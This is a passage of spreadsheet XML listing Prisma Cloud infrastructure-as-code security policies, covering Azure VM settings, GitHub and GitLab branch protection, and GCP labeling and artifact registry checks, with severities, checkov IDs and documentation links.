          <t>Ensure Windows VM enables automatic updates</t>
        </is>
      </c>
      <c r="X951" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.paloaltonetworks.com/prisma/prisma-cloud/prisma-cloud-code-security-policy-reference/azure-policies/azure-general-policies/azr-general-177</t>
        </is>
      </c>
      <c r="Y951" t="inlineStr"/>
      <c r="Z951" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["azurerm_windows_virtual_machine","azurerm_windows_virtual_machine_scale_set"]}</t>
        </is>
      </c>
      <c r="AA951" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB951" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC951" t="inlineStr">
        <is>
          <t>CKV_AZURE_177</t>
        </is>
      </c>
      <c r="AD951" t="b">
        <v>1</v>
      </c>
      <c r="AE951" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF951" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG9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1" t="inlineStr">
        <is>
          <t>4e336f38-10ea-46d5-a643-9b5c01156dbc</t>
        </is>
      </c>
      <c r="AI951" t="inlineStr"/>
      <c r="AJ951" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK951" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="952">
      <c r="A952" t="inlineStr"/>
      <c r="B952" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C952" s="2" t="inlineStr"/>
      <c r="D952" t="inlineStr"/>
      <c r="E952" t="inlineStr"/>
      <c r="F952" t="inlineStr"/>
      <c r="G952" t="b">
        <v>1</v>
      </c>
      <c r="H9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2" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J952" t="inlineStr">
        <is>
          <t>IaC:General:azure-windows</t>
        </is>
      </c>
      <c r="K952" t="inlineStr">
        <is>
          <t>VM Without Azure VM Agent Installed</t>
        </is>
      </c>
      <c r="L952" t="inlineStr"/>
      <c r="M952" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N952" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O952" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P952" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q952" t="inlineStr"/>
      <c r="R952" t="inlineStr"/>
      <c r="S952" t="inlineStr"/>
      <c r="T952" t="b">
        <v>0</v>
      </c>
      <c r="U952" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V952" t="inlineStr">
        <is>
          <t>IaC:General:azure-windows-virtual-machine,azure-windows-virtual-machine-scale-set,azure-linux-virtual-machine-scale-set,azure-linux-virtual-machine</t>
        </is>
      </c>
      <c r="W952" t="inlineStr">
        <is>
          <t>Ensure VM agent is installed</t>
        </is>
      </c>
      <c r="X952" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.paloaltonetworks.com/prisma/prisma-cloud/prisma-cloud-code-security-policy-reference/azure-policies/azure-general-policies/azr-general-179</t>
        </is>
      </c>
      <c r="Y952" t="inlineStr"/>
      <c r="Z952" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["azurerm_windows_virtual_machine","azurerm_windows_virtual_machine_scale_set","azurerm_linux_virtual_machine_scale_set","azurerm_linux_virtual_machine"]}</t>
        </is>
      </c>
      <c r="AA952" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB952" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC952" t="inlineStr">
        <is>
          <t>CKV_AZURE_179</t>
        </is>
      </c>
      <c r="AD952" t="b">
        <v>1</v>
      </c>
      <c r="AE952" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF952" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG9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2" t="inlineStr">
        <is>
          <t>49eb2b34-46e7-43bb-abbb-b39efde2ba04</t>
        </is>
      </c>
      <c r="AI952" t="inlineStr"/>
      <c r="AJ952" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK952" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="953">
      <c r="A953" t="inlineStr"/>
      <c r="B953" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C953" s="2" t="inlineStr"/>
      <c r="D953" t="inlineStr"/>
      <c r="E953" t="inlineStr"/>
      <c r="F953" t="inlineStr"/>
      <c r="G953" t="b">
        <v>0</v>
      </c>
      <c r="H9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3" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J953" t="inlineStr">
        <is>
          <t>IaC:General:ec2-instance</t>
        </is>
      </c>
      <c r="K953" t="inlineStr">
        <is>
          <t>Test policy</t>
        </is>
      </c>
      <c r="L953" t="inlineStr"/>
      <c r="M953" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N953" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O953" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P953" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q953" t="inlineStr"/>
      <c r="R953" t="inlineStr"/>
      <c r="S953" t="inlineStr"/>
      <c r="T953" t="b">
        <v>0</v>
      </c>
      <c r="U953" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V953" t="inlineStr">
        <is>
          <t>IaC:General:ec2-instance</t>
        </is>
      </c>
      <c r="W953" t="inlineStr"/>
      <c r="X953" t="inlineStr"/>
      <c r="Y953" t="inlineStr"/>
      <c r="Z953" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["ec2_instance"],"provider":"aws","framework":["Terraform"],"conditionQuery":{"attribute":"instance_type","operator":"contains","value":"t2.micro","cond_type":"attribute"}}</t>
        </is>
      </c>
      <c r="AA953" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB953" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC953" t="inlineStr"/>
      <c r="AD953" t="b">
        <v>0</v>
      </c>
      <c r="AE953" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF953" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG9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3" t="inlineStr">
        <is>
          <t>289c77d5-7b20-48e5-80c6-c1d80c5b7e34</t>
        </is>
      </c>
      <c r="AI953" t="inlineStr"/>
      <c r="AJ953" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK953" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="954">
      <c r="A954" t="inlineStr"/>
      <c r="B954" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C954" s="2" t="inlineStr"/>
      <c r="D954" t="inlineStr"/>
      <c r="E954" t="inlineStr"/>
      <c r="F954" t="inlineStr"/>
      <c r="G954" t="b">
        <v>1</v>
      </c>
      <c r="H9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4" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J954" t="inlineStr">
        <is>
          <t>IaC:General:github-branch</t>
        </is>
      </c>
      <c r="K954" t="inlineStr">
        <is>
          <t>GitHub pull request configurations defined in Terraform have less than 2 approvals</t>
        </is>
      </c>
      <c r="L954" t="inlineStr"/>
      <c r="M954" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N954" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O954" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P954" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q954" t="inlineStr"/>
      <c r="R954" t="inlineStr"/>
      <c r="S954" t="inlineStr"/>
      <c r="T954" t="b">
        <v>0</v>
      </c>
      <c r="U954" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V954" t="inlineStr">
        <is>
          <t>IaC:General:github-branch-protection,github-branch-protection-v3</t>
        </is>
      </c>
      <c r="W954" t="inlineStr">
        <is>
          <t>GitHub pull requests should require at least 2 approvals</t>
        </is>
      </c>
      <c r="X954" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/build-integrity-policies/github-policies/github-5</t>
        </is>
      </c>
      <c r="Y954" t="inlineStr"/>
      <c r="Z954" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["github_branch_protection","github_branch_protection_v3"]}</t>
        </is>
      </c>
      <c r="AA954" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB954" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC954" t="inlineStr">
        <is>
          <t>CKV_GIT_5</t>
        </is>
      </c>
      <c r="AD954" t="b">
        <v>1</v>
      </c>
      <c r="AE954" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF954" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG9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4" t="inlineStr">
        <is>
          <t>f39a191f-9ec5-44b5-b3e4-1d43e11ba53b</t>
        </is>
      </c>
      <c r="AI954" t="inlineStr"/>
      <c r="AJ954" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK954" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="955">
      <c r="A955" t="inlineStr"/>
      <c r="B955" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C955" s="2" t="inlineStr"/>
      <c r="D955" t="inlineStr"/>
      <c r="E955" t="inlineStr"/>
      <c r="F955" t="inlineStr"/>
      <c r="G955" t="b">
        <v>1</v>
      </c>
      <c r="H9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5" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J955" t="inlineStr">
        <is>
          <t>IaC:General:github-branch</t>
        </is>
      </c>
      <c r="K955" t="inlineStr">
        <is>
          <t>GitHub repository defined in Terraform does not have GPG signatures for all commits</t>
        </is>
      </c>
      <c r="L955" t="inlineStr"/>
      <c r="M955" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N955" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O955" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P955" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q955" t="inlineStr"/>
      <c r="R955" t="inlineStr"/>
      <c r="S955" t="inlineStr"/>
      <c r="T955" t="b">
        <v>0</v>
      </c>
      <c r="U955" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V955" t="inlineStr">
        <is>
          <t>IaC:General:github-branch-protection,github-branch-protection-v3</t>
        </is>
      </c>
      <c r="W955" t="inlineStr">
        <is>
          <t>Ensure GitHub branch protection rules requires signed commits</t>
        </is>
      </c>
      <c r="X955" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/build-integrity-policies/github-policies/github-6</t>
        </is>
      </c>
      <c r="Y955" t="inlineStr"/>
      <c r="Z955" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["github_branch_protection","github_branch_protection_v3"]}</t>
        </is>
      </c>
      <c r="AA955" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB955" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC955" t="inlineStr">
        <is>
          <t>CKV_GIT_6</t>
        </is>
      </c>
      <c r="AD955" t="b">
        <v>1</v>
      </c>
      <c r="AE955" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF955" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG9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5" t="inlineStr">
        <is>
          <t>7f7bbaec-6f7b-4b47-9a26-907bc7ebc2a6</t>
        </is>
      </c>
      <c r="AI955" t="inlineStr"/>
      <c r="AJ955" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK955" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="956">
      <c r="A956" t="inlineStr"/>
      <c r="B956" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C956" s="2" t="inlineStr"/>
      <c r="D956" t="inlineStr"/>
      <c r="E956" t="inlineStr"/>
      <c r="F956" t="inlineStr"/>
      <c r="G956" t="b">
        <v>1</v>
      </c>
      <c r="H9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6" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J956" t="inlineStr">
        <is>
          <t>IaC:General:gitlab-branch</t>
        </is>
      </c>
      <c r="K956" t="inlineStr">
        <is>
          <t>Gitlab branch protection rules defined in Terraform allow force push</t>
        </is>
      </c>
      <c r="L956" t="inlineStr"/>
      <c r="M956" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N956" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O956" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P956" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q956" t="inlineStr"/>
      <c r="R956" t="inlineStr"/>
      <c r="S956" t="inlineStr"/>
      <c r="T956" t="b">
        <v>0</v>
      </c>
      <c r="U956" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V956" t="inlineStr">
        <is>
          <t>IaC:General:gitlab-branch-protection</t>
        </is>
      </c>
      <c r="W956" t="inlineStr">
        <is>
          <t>Ensure force push is disabled</t>
        </is>
      </c>
      <c r="X956" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/build-integrity-policies/gitlab-policies/gitlab-2</t>
        </is>
      </c>
      <c r="Y956" t="inlineStr"/>
      <c r="Z956" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["gitlab_branch_protection"]}</t>
        </is>
      </c>
      <c r="AA956" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB956" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC956" t="inlineStr">
        <is>
          <t>CKV_GLB_2</t>
        </is>
      </c>
      <c r="AD956" t="b">
        <v>1</v>
      </c>
      <c r="AE956" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF956" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG9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6" t="inlineStr">
        <is>
          <t>ba765bbc-096d-4018-9fc3-042e54f26293</t>
        </is>
      </c>
      <c r="AI956" t="inlineStr"/>
      <c r="AJ956" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK956" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="957">
      <c r="A957" t="inlineStr"/>
      <c r="B957" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C957" s="2" t="inlineStr"/>
      <c r="D957" t="inlineStr"/>
      <c r="E957" t="inlineStr"/>
      <c r="F957" t="inlineStr"/>
      <c r="G957" t="b">
        <v>1</v>
      </c>
      <c r="H9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7" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J957" t="inlineStr">
        <is>
          <t>IaC:General:gitlab-project</t>
        </is>
      </c>
      <c r="K957" t="inlineStr">
        <is>
          <t>Gitlab project defined in Terraform requires fewer than 2 approvals</t>
        </is>
      </c>
      <c r="L957" t="inlineStr"/>
      <c r="M957" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N957" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O957" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P957" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q957" t="inlineStr"/>
      <c r="R957" t="inlineStr"/>
      <c r="S957" t="inlineStr"/>
      <c r="T957" t="b">
        <v>0</v>
      </c>
      <c r="U957" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V957" t="inlineStr">
        <is>
          <t>IaC:General:gitlab-project</t>
        </is>
      </c>
      <c r="W957" t="inlineStr">
        <is>
          <t>Ensure at least two approving reviews to merge</t>
        </is>
      </c>
      <c r="X957" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/build-integrity-policies/gitlab-policies/merge-requests-do-not-require-two-or-more-approvals-to-merge</t>
        </is>
      </c>
      <c r="Y957" t="inlineStr"/>
      <c r="Z957" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["gitlab_project"]}</t>
        </is>
      </c>
      <c r="AA957" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB957" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC957" t="inlineStr">
        <is>
          <t>CKV_GLB_1</t>
        </is>
      </c>
      <c r="AD957" t="b">
        <v>1</v>
      </c>
      <c r="AE957" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF957" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG9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7" t="inlineStr">
        <is>
          <t>befd7267-1709-4aa3-8f73-c7311610da34</t>
        </is>
      </c>
      <c r="AI957" t="inlineStr"/>
      <c r="AJ957" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK957" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="958">
      <c r="A958" t="inlineStr"/>
      <c r="B958" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C958" s="2" t="inlineStr"/>
      <c r="D958" t="inlineStr"/>
      <c r="E958" t="inlineStr"/>
      <c r="F958" t="inlineStr"/>
      <c r="G958" t="b">
        <v>1</v>
      </c>
      <c r="H9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8" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J958" t="inlineStr">
        <is>
          <t>IaC:General:gitlab-project</t>
        </is>
      </c>
      <c r="K958" t="inlineStr">
        <is>
          <t>Gitlab project defined in Terraform does not require signed commits</t>
        </is>
      </c>
      <c r="L958" t="inlineStr"/>
      <c r="M958" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N958" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O958" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P958" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q958" t="inlineStr"/>
      <c r="R958" t="inlineStr"/>
      <c r="S958" t="inlineStr"/>
      <c r="T958" t="b">
        <v>0</v>
      </c>
      <c r="U958" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V958" t="inlineStr">
        <is>
          <t>IaC:General:gitlab-project</t>
        </is>
      </c>
      <c r="W958" t="inlineStr">
        <is>
          <t>Ensure commits are signed</t>
        </is>
      </c>
      <c r="X958" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/build-integrity-policies/gitlab-policies/ensure-gitlab-commits-are-signed</t>
        </is>
      </c>
      <c r="Y958" t="inlineStr"/>
      <c r="Z958" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["gitlab_project"]}</t>
        </is>
      </c>
      <c r="AA958" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB958" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC958" t="inlineStr">
        <is>
          <t>CKV_GLB_4</t>
        </is>
      </c>
      <c r="AD958" t="b">
        <v>1</v>
      </c>
      <c r="AE958" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF958" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG9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8" t="inlineStr">
        <is>
          <t>d2106a3f-81c8-4ee9-919b-b519dcedc59d</t>
        </is>
      </c>
      <c r="AI958" t="inlineStr"/>
      <c r="AJ958" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK958" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="959">
      <c r="A959" t="inlineStr"/>
      <c r="B959" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C959" s="2" t="inlineStr"/>
      <c r="D959" t="inlineStr"/>
      <c r="E959" t="inlineStr"/>
      <c r="F959" t="inlineStr"/>
      <c r="G959" t="b">
        <v>1</v>
      </c>
      <c r="H9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59" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J959" t="inlineStr">
        <is>
          <t>IaC:General:google-active</t>
        </is>
      </c>
      <c r="K959" t="inlineStr">
        <is>
          <t>GCP resources that support labels do not have labels</t>
        </is>
      </c>
      <c r="L959" t="inlineStr"/>
      <c r="M959" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N959" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O959" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P959" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q959" t="inlineStr"/>
      <c r="R959" t="inlineStr"/>
      <c r="S959" t="inlineStr"/>
      <c r="T959" t="b">
        <v>0</v>
      </c>
      <c r="U959" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V959" t="inlineStr">
        <is>
          <t>IaC:General:google-active-directory-domain,google-bigquery-dataset,google-bigquery-job,google-bigquery-table,google-bigtable-instance,google-cloud-identity-group,google-cloudfunctions-function,google-composer-environment,google-compute-disk,google-compute-image,google-compute-instance,google-compute-instance-from-template,google-compute-instance-template,google-compute-region-disk,google-compute-snapshot,google-dataflow-job,google-dataproc-cluster,google-dataproc-job,google-dns-managed-zone,google-eventarc-trigger,google-filestore-instance,google-game-services-game-server-cluster,google-game-services-game-server-config,google-game-services-game-server-deployment,google-game-services-realm,google-healthcare-consent-store,google-healthcare-dicom-store,google-healthcare-fhir-store,google-healthcare-hl7-v2-store,google-kms-crypto-key,google-ml-engine-model,google-monitoring-notification-channel,google-network-management-connectivity-test,google-notebooks-instance,google-project,google-pubsub-subscription,google-pubsub-topic,google-redis-instance,google-secret-manager-secret,google-spanner-instance,google-storage-bucket,google-tpu-node,google-workflows-workflow</t>
        </is>
      </c>
      <c r="W959" t="inlineStr">
        <is>
          <t>Ensure GCP resources that support labels have labels</t>
        </is>
      </c>
      <c r="X959" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-resources-that-suppot-labels-have-labels</t>
        </is>
      </c>
      <c r="Y959" t="inlineStr"/>
      <c r="Z959" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["google_active_directory_domain","google_bigquery_dataset","google_bigquery_job","google_bigquery_table","google_bigtable_instance","google_cloud_identity_group","google_cloudfunctions_function","google_composer_environment","google_compute_disk","google_compute_image","google_compute_instance","google_compute_instance_from_template","google_compute_instance_template","google_compute_region_disk","google_compute_snapshot","google_dataflow_job","google_dataproc_cluster","google_dataproc_job","google_dns_managed_zone","google_eventarc_trigger","google_filestore_instance","google_game_services_game_server_cluster","google_game_services_game_server_config","google_game_services_game_server_deployment","google_game_services_realm","google_healthcare_consent_store","google_healthcare_dicom_store","google_healthcare_fhir_store","google_healthcare_hl7_v2_store","google_kms_crypto_key","google_ml_engine_model","google_monitoring_notification_channel","google_network_management_connectivity_test","google_notebooks_instance","google_project","google_pubsub_subscription","google_pubsub_topic","google_redis_instance","google_secret_manager_secret","google_spanner_instance","google_storage_bucket","google_tpu_node","google_workflows_workflow"]}</t>
        </is>
      </c>
      <c r="AA959" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB959" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC959" t="inlineStr">
        <is>
          <t>CKV_GCP_CUSTOM_1</t>
        </is>
      </c>
      <c r="AD959" t="b">
        <v>1</v>
      </c>
      <c r="AE959" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF959" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG9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59" t="inlineStr">
        <is>
          <t>5969c32e-6e8f-48ff-bc9e-3a60d5ddafe6</t>
        </is>
      </c>
      <c r="AI959" t="inlineStr"/>
      <c r="AJ959" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK959" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="960">
      <c r="A960" t="inlineStr"/>
      <c r="B960" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C960" s="2" t="inlineStr"/>
      <c r="D960" t="inlineStr"/>
      <c r="E960" t="inlineStr"/>
      <c r="F960" t="inlineStr"/>
      <c r="G960" t="b">
        <v>1</v>
      </c>
      <c r="H9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0" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J960" t="inlineStr">
        <is>
          <t>IaC:General:google-artifact</t>
        </is>
      </c>
      <c r="K960" t="inlineStr">
        <is>
          <t>GCP Artifact Registry repositories are not encrypted with Customer Supplied Encryption Keys (CSEK)</t>
        </is>
      </c>
      <c r="L960" t="inlineStr"/>
      <c r="M960" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N960" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O960" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P960" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q960" t="inlineStr"/>
      <c r="R960" t="inlineStr"/>
      <c r="S960" t="inlineStr"/>
      <c r="T960" t="b">
        <v>0</v>
      </c>
      <c r="U960" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V960" t="inlineStr">
        <is>
          <t>IaC:General:google-artifact-registry-repository</t>
        </is>
      </c>
      <c r="W960" t="inlineStr">
        <is>
          <t>Ensure Artifact Registry Repositories are encrypted with Customer Supplied Encryption Keys (CSEK)</t>
        </is>
      </c>
      <c r="X960" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-artifact-registry-repositories-are-encrypted-with-customer-supplied-encryption-keys-csek</t>
        </is>
      </c>
      <c r="Y960" t="inlineStr"/>
      <c r="Z960" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["google_artifact_registry_repository"]}</t>
        </is>
      </c>
      <c r="AA960" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB960" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC960" t="inlineStr">
        <is>
          <t>CKV_GCP_84</t>
        </is>
      </c>
      <c r="AD960" t="b">
        <v>1</v>
      </c>
      <c r="AE960" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF960" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG9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0" t="inlineStr">
        <is>
          <t>ce1a6762-478b-48c6-b01c-f5a1479512c6</t>
        </is>
      </c>
      <c r="AI960" t="inlineStr"/>
      <c r="AJ960" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK960" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="961">
      <c r="A961" t="inlineStr">
        <is>
          <t>PCS SWAT Standards (SWATS) 1.0 - DO NOT TOUCH</t>
        </is>
      </c>
      <c r="B961" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C961" s="2" t="inlineStr"/>
      <c r="D961" t="inlineStr"/>
      <c r="E961" t="inlineStr"/>
      <c r="F961" t="inlineStr"/>
      <c r="G961" t="b">
        <v>1</v>
      </c>
      <c r="H9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1" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J961" t="inlineStr">
        <is>
          <t>IaC:General:google-artifact</t>
        </is>
      </c>
      <c r="K961" t="inlineStr">
        <is>
          <t>GCP Artifact Registry repositories are anonymously or publicly accessible</t>
        </is>
      </c>
